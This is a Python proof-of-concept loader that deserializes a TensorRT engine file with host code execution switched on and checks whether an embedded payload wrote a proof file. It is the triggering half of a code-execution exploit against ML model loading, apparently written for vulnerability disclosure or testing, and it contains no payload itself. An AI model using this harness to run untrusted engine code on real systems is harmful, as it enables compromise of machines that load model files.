"""
PoC loader: demonstrates arbitrary code execution (RCE) when a malicious
TensorRT engine file is deserialized.

Usage: python load_poc.py <path_to_malicious.engine>
"""
|
|
| import os |
| import sys |
| import platform |
|
|
|
|
def _proof_file_path():
    # Return the path the embedded payload is expected to write its proof file to.
    if platform.system() == "Windows":
        return "tensorrt_rce_poc.txt"
    return "/tmp/tensorrt_rce_poc"


def _print_banner(engine_path, trt_version):
    # Print the run header: engine path, engine size on disk, TensorRT version.
    print("=" * 70)
    print("TensorRT Engine RCE PoC — Loading Malicious Engine")
    print("=" * 70)
    print()
    print(f"[*] Engine file: {engine_path}")
    print(f"[*] Engine size: {os.path.getsize(engine_path)} bytes")
    print(f"[*] TensorRT version: {trt_version}")
    print()


def _report_proof_file(poc_file):
    # Print the proof file's contents if it exists; otherwise point at stderr.
    print()
    if os.path.exists(poc_file):
        print("=" * 70)
        print("[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
        print(f"[!!!] Proof file: {poc_file}")
        print("=" * 70)
        print()
        # The file was written by foreign code, so its encoding is unknown.
        # errors="replace" keeps a stray byte from aborting the report
        # (the platform default, e.g. cp1252, would raise instead).
        with open(poc_file, "r", encoding="utf-8", errors="replace") as f:
            print(f.read())
    else:
        print(f"[*] Proof file not found at {poc_file}")
        print("[*] Check stderr output above for execution evidence")


def main():
    """Deserialize a TensorRT engine file and report whether embedded code ran.

    Reads the engine path from ``sys.argv[1]``. The steps are:

    1. Delete any stale proof file.
    2. Deserialize the engine with ``runtime.engine_host_code_allowed = True``.
    3. Check whether the proof file was created during deserialization.

    Exits with status 1 if no path is given, if the path is not a regular
    file, or if the ``tensorrt`` package cannot be imported.
    """
    if len(sys.argv) < 2:
        print("Usage: python load_poc.py <path_to_malicious.engine>")
        sys.exit(1)

    engine_path = sys.argv[1]
    # isfile rather than exists: a directory would pass exists() and then
    # fail later with IsADirectoryError in open().
    if not os.path.isfile(engine_path):
        print(f"[!] File not found: {engine_path}")
        sys.exit(1)

    try:
        import tensorrt as trt
    except ImportError:
        print("[!] tensorrt not installed: pip install tensorrt")
        sys.exit(1)

    poc_file = _proof_file_path()
    # Remove a stale proof file so only this run's deserialization can
    # produce a positive result.
    if os.path.exists(poc_file):
        os.remove(poc_file)

    _print_banner(engine_path, trt.__version__)

    logger = trt.Logger(trt.Logger.INFO)
    runtime = trt.Runtime(logger)

    # Security-relevant switch. It permits deserializing engines that carry
    # host-executable code, which is the behaviour this PoC exercises.
    # TODO confirm exact semantics against the TensorRT IRuntime docs for the
    # installed version.
    runtime.engine_host_code_allowed = True
    print("[*] runtime.engine_host_code_allowed = True")
    print("[*] Calling deserialize_cuda_engine()...")
    print("[*] (If RCE works, you'll see output from the embedded code below)")
    print()

    with open(engine_path, "rb") as f:
        engine_data = f.read()

    # Flush before entering native code. Otherwise buffered banner text can
    # appear *after* anything the embedded code writes directly to the fds.
    sys.stdout.flush()

    engine = None
    deserialize_error = None
    try:
        engine = runtime.deserialize_cuda_engine(engine_data)
    except Exception as exc:  # top-level boundary: report, then still check proof
        # Embedded code may already have run before the binding raised, so
        # the proof-file check below must not be skipped.
        deserialize_error = exc

    print()
    if engine:
        print(f"[+] Engine loaded: {engine.num_io_tensors} I/O tensors")
    elif deserialize_error is not None:
        print(
            f"[*] deserialize_cuda_engine() raised "
            f"{type(deserialize_error).__name__}: {deserialize_error} "
            "(malicious code may still have executed)"
        )
    else:
        print("[*] Engine returned None (malicious code may still have executed)")

    _report_proof_file(poc_file)


if __name__ == "__main__":
    main()
|
|